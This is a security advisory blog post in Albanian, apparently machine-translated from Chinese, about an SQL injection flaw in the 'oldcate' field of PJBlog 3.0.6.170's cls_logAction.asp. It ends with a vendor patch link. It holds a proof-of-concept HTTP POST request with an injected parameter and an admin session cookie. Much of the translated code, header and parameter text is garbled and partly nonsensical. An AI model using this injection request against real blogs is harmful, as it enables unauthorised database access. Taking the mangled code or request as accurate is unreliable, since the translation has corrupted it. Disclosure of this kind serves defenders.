Sistemi PJBlog personal blog cls_logAction.asp injeksion fotografi dobësi ekziston
Posted by admin11 Maj
version i prekur: PJBlog 3.0.6.170
Përshkrimi i Programit:
PJBlog një burim të hapur blog falas programet e sistemit në individët kineze, duke përdorur teknologji asp + Access, kanë efektivitetin shumë të lartë dhe norma rinovimin, gjithashtu mbështetjen e teknologjisë së re të përdorura në Blog. Analiza Vulnerability:
Në klasën e dokumentit / cls_logAction.asp në:
. form ( "oldcate" ) //第429行 = Oldcate kërkesës. Formë ("oldcate") / / 429 linja . form ( "oldtype" ) = Oldctype kërkesës. Formë ("oldtype") ( "select cate_Part from blog_Category where cate_ID=" & oldcate ) ( 0 ) D = conn. Ekzekuto ("cate_Part zgjidhni nga blog_Category ku cate_ID =" & oldcate) (0)
Programi nuk bën ndonjë filtrimin në oldcate ndryshueshme në Pyetje SQL, duke rezultuar në dobësi injeksion.
PAS / blogedit.asp HTTP/1.1 Pranoni: application / x-shockwave-flash, image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, aplikimi / msword, aplikimi / vnd.ms-excel, aplikimi / vnd.ms-powerpoint, * / * Referer: http://127.0.0.1/blogedit.asp?id=1 Prano-Language: zh-cn Content-Type: application / x-www-urlencoded formë-UA-CPU: Prano x86-Encoding: gzip, ul çmimet User-Agent: Mozilla/4.0 (compatible; 7,0 Shëno; Windows NT 5.1 TencentTraveler 4,0;. NET CLR 2.0.50727) Host: 127.0.0.1 Content-Length: 513 Connection: Keep-Alive Cache-Control: no-cache Cookie: __utma = 96992031.4542583209449947600.1239335726.1240296350.1240324232.7; __utmz = 96992031.1239335726.1.1.utmcsr = (i drejtpërdrejtë) utmccn | = (i drejtpërdrejtë) | utmcmd = () asnjë; PJBlog3Setting = ViewType = normal; PJBlog3 = memRight = 111111111111 & memHashKey = c80f369e20b317566f736dbc70839834745d9c20 & memName = admin & exp = 2010% 2D4% 2D21; ASPSESSIONIDCCDSDABA = OEBBHCODJFKIJEGKGCPHGMCP id 1 = & log_editType = 1 & veprim post = & log_IsDraft = False & title = xxx & log_CateID = 3 & cname = xxx & ctype = 0 & oldcname = xxx & oldtype = 0 & oldcate = 3201 = 1 & log_weather = diell & log_Level = level3 & log_comorder = 1 & blog_pws = 0 & log_Readpw = & log_Pwtips = & c_pws = 0 & blog_Meta = 0 & evio_KeyWords = xxx & evio_Description = + web sigurt & log_From =% E6% 9C AC%% E7%% AB 99% E5% 8E% 9F% E5% 9b 88% & log_FromURL =% http 3A% 2F 2Flocalhost% 2F%% 2Fbackci & PubTimeType com = & PubTime = 2009/4/21 15% 3A54% 3A46 & tags UBBfonts = & = & UBBfonts = & UBBfonts = & UBBmethod = më = + & Mesazh web sigurt & log_Intro + = web sigurt & log_Quote = Zgjidhja:
patch Vendor:
PJblog
-------
shitësit aktuale kanë lëshuar arna për të rregulluar këtë çështje të sigurisë, ju lutem shkoni në faqen e prodhuesit në shtëpi për të shkarkuar:
http://bbs.pjhome.net/thread-52214-1-1.html
Burimi:
<* Burimi: http://www.cnbct.org Bug.Center.Team
Links: http://wavdb.com/vuln/1410 *>










































Nuk ka komente
Ju duhet të keni hyrë brenda për të postoj një koment.